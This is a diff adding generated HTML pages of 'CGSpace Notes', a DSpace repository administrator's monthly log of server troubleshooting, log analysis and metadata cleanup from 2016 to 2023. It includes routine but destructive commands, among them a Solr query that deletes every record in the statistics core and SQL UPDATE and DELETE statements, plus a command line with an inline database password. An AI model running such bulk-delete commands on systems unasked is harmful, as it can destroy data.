# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+
    +
  • 85.25.237.71 is the “Linguee Bot” that I first saw last month
  • +
  • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
  • +
  • There were just over 3 million accesses in the nginx logs last month:
  • +
+
# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+
+ Read more → +
+ + + + + + +
+
+

January, 2019

+ +
+

2019-01-02

+
    +
  • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
  • +
  • I don’t see anything interesting in the web server logs around that time though:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+
+ Read more → +
+ + + + + + +
+
+

December, 2018

+ +
+

2018-12-01

+
    +
  • Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK
  • +
  • I manually installed OpenJDK, then removed Oracle JDK, then re-ran the Ansible playbook to update all configuration files, etc
  • +
  • Then I ran all system updates and restarted the server
  • +
+

2018-12-02

+ + Read more → +
+ + + + + + +
+
+

November, 2018

+ +
+

2018-11-01

+
    +
  • Finalize AReS Phase I and Phase II ToRs
  • +
  • Send a note about my dspace-statistics-api to the dspace-tech mailing list
  • +
+

2018-11-03

+
    +
  • Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
  • +
  • Today these are the top 10 IPs:
  • +
+ Read more → +
+ + + + + + +
+
+

October, 2018

+ +
+

2018-10-01

+
    +
  • Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
  • +
  • I created a GitHub issue to track this #389, because I’m super busy in Nairobi right now
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/page/7/index.html b/docs/page/7/index.html new file mode 100644 index 000000000..600f2a24c --- /dev/null +++ b/docs/page/7/index.html @@ -0,0 +1,497 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

September, 2018

+ +
+

2018-09-02

+
    +
  • New PostgreSQL JDBC driver version 42.2.5
  • +
  • I’ll update the DSpace role in our Ansible infrastructure playbooks and run the updated playbooks on CGSpace and DSpace Test
  • +
  • Also, I’ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system’s RAM, and we never re-ran them after migrating to larger Linodes last month
  • +
  • I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I’m getting those autowire errors in Tomcat 8.5.30 again:
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2018

+ +
+

2018-08-01

+
    +
  • DSpace Test had crashed at some point yesterday morning and I see the following in dmesg:
  • +
+
[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+
    +
  • Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight
  • +
  • From the DSpace log I see that eventually Solr stopped responding, so I guess the java process that was OOM killed above was Tomcat’s
  • +
  • I’m not sure why Tomcat didn’t crash with an OutOfMemoryError…
  • +
  • Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core
  • +
  • The server only has 8GB of RAM so we’ll eventually need to upgrade to a larger one because we’ll start starving the OS, PostgreSQL, and command line batch processes
  • +
  • I ran all system updates on DSpace Test and rebooted it
  • +
+ Read more → +
+ + + + + + +
+
+

July, 2018

+ +
+

2018-07-01

+
    +
  • I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:
  • +
+
$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+
    +
  • During the mvn package stage on the 5.8 branch I kept getting issues with java running out of memory:
  • +
+
There is insufficient memory for the Java Runtime Environment to continue.
+
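  • That message means the JVM could not get memory from the operating system at all, so the usual remedies are freeing RAM on the server, adding swap, or explicitly capping the build’s heap (a sketch; the value is illustrative):
  • +
+
$ MAVEN_OPTS="-Xmx512m" mvn -U clean package
+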
+ Read more → +
+ + + + + + +
+
+

June, 2018

+ +
+

2018-06-04

+
    +
  • Test the DSpace 5.8 module upgrades from Atmire (#378) +
      +
    • There seems to be a problem with the CUA and L&R versions in pom.xml because they are using SNAPSHOT and it doesn’t build
    • +
    +
  • +
  • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
  • +
  • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
+
    +
  • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
  • +
  • Time to index ~70,000 items on CGSpace:
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+
+ Read more → +
+ + + + + + +
+
+

May, 2018

+ +
+

2018-05-01

+
    +
  • I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface (equivalent curl calls are sketched below): +
      +
    • http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E
    • +
    • http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
    • +
    +
  • +
  • Then I reduced the JVM heap size from 6144 back to 5120m
  • +
  • Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
  • +
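  • For reference, the same two calls can be made from the command line (a sketch using the exact URLs above):
  • +
+
$ curl "http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E"
+$ curl "http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E"
+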
+ Read more → +
+ + + + + + +
+
+

April, 2018

+ +
+

2018-04-01

+
    +
  • I tried to test something on DSpace Test but noticed that it’s been down since god knows when
  • +
  • Catalina logs at least show some memory errors yesterday:
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2018

+ +
+

2018-03-02

+
    +
  • Export a CSV of the IITA community metadata for Martin Mueller
  • +
+ Read more → +
+ + + + + + +
+
+

February, 2018

+ +
+

2018-02-01

+
    +
  • Peter gave feedback on the dc.rights proof of concept that I had sent him last week
  • +
  • We don’t need to distinguish between internal and external works, so that makes it just a simple list
  • +
  • Yesterday I figured out how to monitor DSpace sessions using JMX
  • +
  • I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu’s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2018

+ +
+

2018-01-02

+
    +
  • Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time
  • +
  • I didn’t get any load alerts from Linode and the REST and XMLUI logs don’t show anything out of the ordinary
  • +
  • The nginx logs show HTTP 200s until 02/Jan/2018:11:27:17 +0000 when Uptime Robot got an HTTP 500
  • +
  • In dspace.log around that time I see many errors like “Client closed the connection before file download was complete”
  • +
  • And just before that I see this:
  • +
+
Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+
    +
  • Ah hah! So the pool was actually empty!
  • +
  • I need to increase that, let’s try to bump it up from 50 to 75
  • +
  • After that one client got an HTTP 499 but then the rest were HTTP 200, so I don’t know what the hell Uptime Robot saw
  • +
  • I notice this error quite a few times in dspace.log:
  • +
+
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
+
    +
  • And there are many of these errors every day for the past month:
  • +
+
$ grep -c "Error while searching for sidebar facets" dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+
    +
  • Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let’s Encrypt if it’s just a handful of domains
  • +
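For what it is worth, a minimal certbot sketch for a handful of explicit hostnames instead of a wildcard (the hostnames and webroot path are hypothetical):
$ certbot certonly --webroot -w /var/www/html -d www.ilri.org -d news.ilri.org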
+ Read more → +
+ + + + + + +
+
+

December, 2017

+ +
+

2017-12-01

+
    +
  • Uptime Robot noticed that CGSpace went down
  • +
  • The logs say “Timeout waiting for idle object”
  • +
  • PostgreSQL activity says there are 115 connections currently
  • +
  • The list of connections to XMLUI and REST API for today:
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/page/8/index.html b/docs/page/8/index.html new file mode 100644 index 000000000..0efb19c5d --- /dev/null +++ b/docs/page/8/index.html @@ -0,0 +1,444 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+


+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

November, 2017

+ +
+

2017-11-01

+
    +
  • The CORE developers responded to say they are looking into their bot not respecting our robots.txt
  • +
+

2017-11-02

+
    +
  • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
  • +
+
# grep -c "CORE" /var/log/nginx/access.log
+0
+
    +
  • Generate list of authors on CGSpace for Peter to go through and correct:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+
+ Read more → +
+ + + + + + +
+
+

October, 2017

+ +
+

2017-10-01

+ +
http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+
    +
  • There appears to be a pattern but I’ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine (a possible SQL starting point is sketched after this list)
  • +
  • Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
  • +
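As a possible SQL starting point, something like this would list items that have more than one handle URI; the metadata_field_id for dc.identifier.uri is an assumption here and needs to be checked against the field registry first:
dspace=# SELECT resource_id, count(*) FROM metadatavalue WHERE metadata_field_id = 25 AND resource_type_id = 2 GROUP BY resource_id HAVING count(*) > 1;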
+ Read more → +
+ + + + + + +
+
+

CGIAR Library Migration

+ +
+

Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called CGIAR System Organization.

+ Read more → +
+ + + + + + +
+
+

September, 2017

+ +
+

2017-09-06

+
    +
  • Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours
  • +
+

2017-09-07

+
    +
  • Ask Sisay to clean up the WLE approvers a bit, as Marianne’s user account is both in the approvers step as well as the group
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2017

+ +
+

2017-08-01

+
    +
  • Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours
  • +
  • I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)
  • +
  • The good thing is that, according to dspace.log.2017-08-01, they are all using the same Tomcat session
  • +
  • This means our Tomcat Crawler Session Valve is working
  • +
  • But many of the bots are browsing dynamic URLs like: +
      +
    • /handle/10568/3353/discover
    • +
    • /handle/10568/16510/browse
    • +
    +
  • +
  • The robots.txt only blocks the top-level /discover and /browse URLs… we will need to find a way to forbid them from accessing these!
  • +
  • Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): https://jira.duraspace.org/browse/DS-2962
  • +
  • It turns out that we’re already adding the X-Robots-Tag "none" HTTP header, but this only forbids the search engine from indexing the page, not crawling it! (a quick curl check for the header is sketched after this list)
  • +
  • Also, the bot has to successfully browse the page first so it can receive the HTTP header…
  • +
  • We might actually have to block these requests with HTTP 403 depending on the user agent
  • +
  • Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415
  • +
  • This was due to newline characters in the dc.description.abstract column, which caused OpenRefine to choke when exporting the CSV
  • +
  • I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d
  • +
  • Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
  • +
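A quick sketch of how to confirm the X-Robots-Tag header on one of those dynamic URLs (case-insensitive grep, since header case can vary):
$ curl -s -I 'https://cgspace.cgiar.org/handle/10568/3353/discover' | grep -i x-robots-tag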
+ Read more → +
+ + + + + + +
+
+

July, 2017

+ +
+

2017-07-01

+
    +
  • Run system updates and reboot DSpace Test
  • +
+

2017-07-04

+
    +
  • Merge changes for WLE Phase II theme rename (#329)
  • +
  • Looking at extracting the metadata registries from ICARDA’s MEL DSpace database so we can compare fields with CGSpace
  • +
  • We can use PostgreSQL’s extended output format (-x) plus sed to format the output into quasi XML:
  • +
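A minimal sketch of the idea (the table and the sed expression are illustrative): -x prints each row as one “column | value” pair per line, which sed can then wrap into quasi-XML elements:
$ psql -x -c 'SELECT * FROM metadatafieldregistry;' dspace | sed -e 's/^\([a-z_]*\) *| \(.*\)/<\1>\2<\/\1>/'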
+ Read more → +
+ + + + + + +
+
+

June, 2017

+ +
+ 2017-06-01: After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes. The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes. Then we’ll create a new sub-community for Phase II and create collections for the research themes there. The current “Research Themes” community will be renamed to “WLE Phase I Research Themes”. Tagged all items in the current Phase I collections with their appropriate themes. Create pull request to add Phase II research themes to the submission form: #328. Add cg. + Read more → +
+ + + + + + +
+
+

May, 2017

+ +
+ 2017-05-01: ICARDA apparently started working on CG Core on their MEL repository. They have done a few cg.* fields, but not very consistently, and they even copy some of CGSpace’s items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02: Atmire got back about the Workflow Statistics issue, and apparently it’s a bug in the CUA module, so they will send us a pull request. 2017-05-04: Sync DSpace Test with the database and assetstore from CGSpace. Re-deploy DSpace Test with Atmire’s CUA patch for workflow statistics, run system updates, and restart the server. Now I can see the workflow statistics and am able to select users, but everything returns 0 items. Megan says there are still some mapped items that are not appearing since last week, so I forced a full index-discovery -b. Need to remember to check whether the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSpace Test) tomorrow: https://cgspace. + Read more → +
+ + + + + + +
+
+

April, 2017

+ +
+

2017-04-02

+
    +
  • Merge one change to CCAFS flagships that I had forgotten to remove last month (“MANAGING CLIMATE RISK”): https://github.com/ilri/DSpace/pull/317
  • +
  • Quick proof-of-concept hack to add dc.rights to the input form, including some inline instructions/hints:
  • +
+

dc.rights in the submission form

+
    +
  • Remove redundant/duplicate text in the DSpace submission license
  • +
  • Testing the CMYK patch on a collection with 650 items:
  • +
+
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
+
+ Read more → +
+ + + + + + +
+
+

March, 2017

+ +
+

2017-03-01

+
    +
  • Run the 279 CIAT author corrections on CGSpace
  • +
+

2017-03-02

+
    +
  • Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace
  • +
  • CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles
  • +
  • They might come in at the top level in one “CGIAR System” community, or with several communities
  • +
  • I need to spend a bit of time looking at the multiple handle support in DSpace and see whether new content can be minted in both handles, or just one
  • +
  • Need to send Peter and Michael some notes about this in a few days
  • +
  • Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI
  • +
  • Filed an issue on DSpace issue tracker for the filter-media bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: DS-3516
  • +
  • Discovered that the ImageMagic filter-media plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK
  • +
  • Interestingly, it seems DSpace 4.x’s thumbnails were sRGB, but forcing regeneration using DSpace 5.x’s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see 10568/51999):
  • +
+
$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/page/9/index.html b/docs/page/9/index.html new file mode 100644 index 000000000..de33ad9ed --- /dev/null +++ b/docs/page/9/index.html @@ -0,0 +1,453 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+


+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

February, 2017

+ +
+

2017-02-07

+
    +
  • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
  • +
+
dspace=# select * from collection2item where item_id = '80278';
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+
    +
  • Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
  • +
  • Looks like we’ll be using cg.identifier.ccafsprojectpii as the field name
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2017

+ +
+

2017-01-02

+
    +
  • I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error
  • +
  • I tested on DSpace Test as well and it doesn’t work there either
  • +
  • I asked on the dspace-tech mailing list because it seems to be broken, and actually now I’m not sure if we’ve ever had the sharding task run successfully over all these years
  • +
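For context, the yearly sharding is normally invoked with DSpace’s stats-util tool; a sketch, assuming its -s (shard) option:
$ [dspace]/bin/dspace stats-util -s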
+ Read more → +
+ + + + + + +
+
+

December, 2016

+ +
+

2016-12-02

+
    +
  • CGSpace was down for five hours in the morning while I was sleeping
  • +
  • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
  • +
+
2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+
    +
  • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
  • +
  • I’ve raised a ticket with Atmire to ask
  • +
  • Another worrying error from dspace.log is:
  • +
+ Read more → +
+ + + + + + +
+
+

November, 2016

+ +
+

2016-11-01

+
    +
  • Add dc.type to the output options for Atmire’s Listings and Reports module (#286)
  • +
+

Listings and Reports with output type

+ Read more → +
+ + + + + + +
+
+

October, 2016

+ +
+

2016-10-03

+
    +
  • Testing adding ORCIDs to a CSV file for a single item to see if the author orders get messed up
  • +
  • Need to test the following scenarios to see how author order is affected: +
      +
    • ORCIDs only
    • +
    • ORCIDs plus normal authors
    • +
    +
  • +
  • I exported a random item’s metadata as CSV, deleted all columns except id and collection, and made a new column called ORCID:dc.contributor.author with the following random ORCIDs from the ORCID registry:
  • +
+
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+
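For context, the resulting test CSV would have roughly this shape (the item id and collection handle here are made up):
id,collection,ORCID:dc.contributor.author
80001,10568/100,0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X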
+ Read more → +
+ + + + + + +
+
+

September, 2016

+ +
+

2016-09-01

+
    +
  • Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors
  • +
  • Discuss how the migration of CGIAR’s Active Directory to a flat structure will break our LDAP groups in DSpace
  • +
  • We had been using DC=ILRI to determine whether a user was ILRI or not
  • +
  • It looks like we might be able to use OUs now, instead of DCs:
  • +
+
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+
+ Read more → +
+ + + + + + +
+
+

August, 2016

+ +
+

2016-08-01

+
    +
  • Add updated distribution license from Sisay (#259)
  • +
  • Play with upgrading Mirage 2 dependencies in bower.json because most are several versions out of date
  • +
  • Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more
  • +
  • bower stuff is a dead end, waste of time, too many issues
  • +
  • Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of fonts)
  • +
  • Start working on DSpace 5.1 → 5.5 port:
  • +
+
$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+
+ Read more → +
+ + + + + + +
+
+

July, 2016

+ +
+

2016-07-01

+
    +
  • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
  • +
  • I think this query should find and replace all authors that have “,” at the end of their names:
  • +
+
dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+ text_value
+------------
+(0 rows)
+
    +
  • In this case the select query was showing 95 results before the update
  • +
+ Read more → +
+ + + + + + +
+
+

June, 2016

+ +
+

2016-06-01

+ + Read more → +
+ + + + + + +
+
+

May, 2016

+ +
+

2016-05-01

+
    +
  • Since yesterday there have been 10,000 REST errors and the site has been unstable again
  • +
  • I have blocked access to the API now
  • +
  • There are 3,000 IPs accessing the REST API in a 24-hour period!
  • +
+
# awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
+3168
+
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/posts/index.html b/docs/posts/index.html new file mode 100644 index 000000000..46efd49f9 --- /dev/null +++ b/docs/posts/index.html @@ -0,0 +1,440 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+


+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

July, 2023

+ +
+ 2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as “Copyrighted; all rights reserved” based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it’s usually copyrighted (could still be open access, but we can’t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status… In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don’t like the Impact Area icons as a component because they don’t have any visual meaning + Read more → +
+ + + + + + +
+
+

June, 2023

+ +
+

2023-06-02

+
    +
  • Spend some time testing my post_bitstreams.py script to update thumbnails for items on CGSpace +
      +
    • Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail…
    • +
    +
  • +
  • Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace +
      +
    • They have experience with improving the MODS interface in MELSpace’s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace
    • +
    • From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

May, 2023

+ +
+

2023-05-03

+
    +
  • Alliance’s TIP team emailed me to ask about issues authenticating on CGSpace +
      +
    • It seems their password expired, which is annoying
    • +
    +
  • +
  • I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week +
      +
    • There are many of our subjects that would match if they added a "-", like "high yielding varieties", or used the singular…
    • +
    • Also I found at least two spelling mistakes, for example “decison support systems”, which would match if it was spelled correctly
    • +
    +
  • +
  • Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2023

+ +
+

2023-04-02

+
    +
  • Run all system updates on CGSpace and reboot it
  • +
  • I exported CGSpace to CSV to check for any missing Initiative collection mappings +
      +
    • I also did a check for missing country/region mappings with csv-metadata-quality
    • +
    +
  • +
  • Start a harvest on AReS
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2023

+ +
+

2023-03-01

+
    +
  • Remove cg.subject.wle and cg.identifier.wletheme from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)
  • +
  • iso-codes 4.13.0 was released, which incorporates my changes to the common names for Iran, Laos, and Syria
  • +
  • I finally got through with porting the input form from DSpace 6 to DSpace 7
  • +
+ Read more → +
+ + + + + + +
+
+

February, 2023

+ +
+

2023-02-01

+
    +
  • Export CGSpace to cross check the DOI metadata with Crossref +
      +
    • I want to try to expand my use of their data to journals, publishers, volumes, issues, etc…
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2023

+ +
+

2023-01-01

+
    +
  • Apply some more ORCID identifiers to items on CGSpace using my 2022-09-22-add-orcids.csv file +
      +
    • I want to update all ORCID names and refresh them in the database
    • +
    • I see we have some new ones that aren’t in our list if I combine with this file:
    • +
    +
  • +
